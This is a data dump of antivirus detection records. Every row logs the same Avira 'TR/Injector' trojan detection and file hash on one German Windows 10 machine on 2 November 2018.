  Row(detection=Row(filename='avscan-20181102-055518-d8c496a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055518-D8C496A8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054602-8d5e81ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054602-8D5E81EA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062005-4f452afe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062005-4F452AFE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055200-6323bcdf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055200-6323BCDF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051844-bd2066cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051844-BD2066CB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051857-c4b6a260', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051857-C4B6A260', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051823-b0e513c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051823-B0E513C3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051805-a5a9466b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051805-A5A9466B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051804-a54049a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051804-A54049A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051823-b0ac3dd6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051823-B0AC3DD6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055552-ed79b359', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055552-ED79B359', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051807-a7629379', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051807-A7629379', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055509-d375b2bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055509-D375B2BC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051835-b796b271', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051835-B796B271', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062007-502c6967', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062007-502C6967', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051858-c5a05558', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051858-C5A05558', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055511-d4df6d8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055511-D4DF6D8C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055512-d51127a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055512-D51127A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062054-6c63546a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062054-6C63546A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051857-c4dfefb6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051857-C4DFEFB6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051857-c508e474', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051857-C508E474', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062036-6193ff76', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062036-6193FF76', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051824-b1264205', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051824-B1264205', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054626-9bdc1c75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054626-9BDC1C75', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055509-d381519c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055509-D381519C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055142-5825ebfb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055142-5825EBFB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062005-4f32d667', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062005-4F32D667', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051811-a9ab0f8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051811-A9AB0F8C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054656-ad7125c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054656-AD7125C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055531-e0ef08a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055531-E0EF08A5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054247-197cec28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054247-197CEC28', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062047-682bfc61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062047-682BFC61', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062051-6aa71b1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062051-6AA71B1B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055532-e13fe308', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055532-E13FE308', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055552-ed3b6d19', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055552-ED3B6D19', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062051-6aae6d79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062051-6AAE6D79', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051850-c0b4303d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051850-C0B4303D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054249-1a8b8e3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054249-1A8B8E3D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055532-e133d431', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055532-E133D431', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054626-9bd840a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054626-9BD840A9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055534-e2bb6470', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055534-E2BB6470', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054211-03c8b12d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054211-03C8B12D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055538-e49aa0fc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055538-E49AA0FC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051813-aadf6114', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051813-AADF6114', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051850-c0c72617', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051850-C0C72617', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055518-d8a69e2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055518-D8A69E2C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055142-580e9a07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055142-580E9A07', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051841-bb9ca293', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051841-BB9CA293', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062039-63824478', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062039-63824478', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055557-f0179d49', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055557-F0179D49', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055117-497b6716', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055117-497B6716', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054621-98f21898', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054621-98F21898', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062024-5a9fce7b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062024-5A9FCE7B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051853-c2d58ccf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051853-C2D58CCF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055505-d1122b59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055505-D1122B59', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:04Z'), dt=datetime.date(2018, 11, 2)),
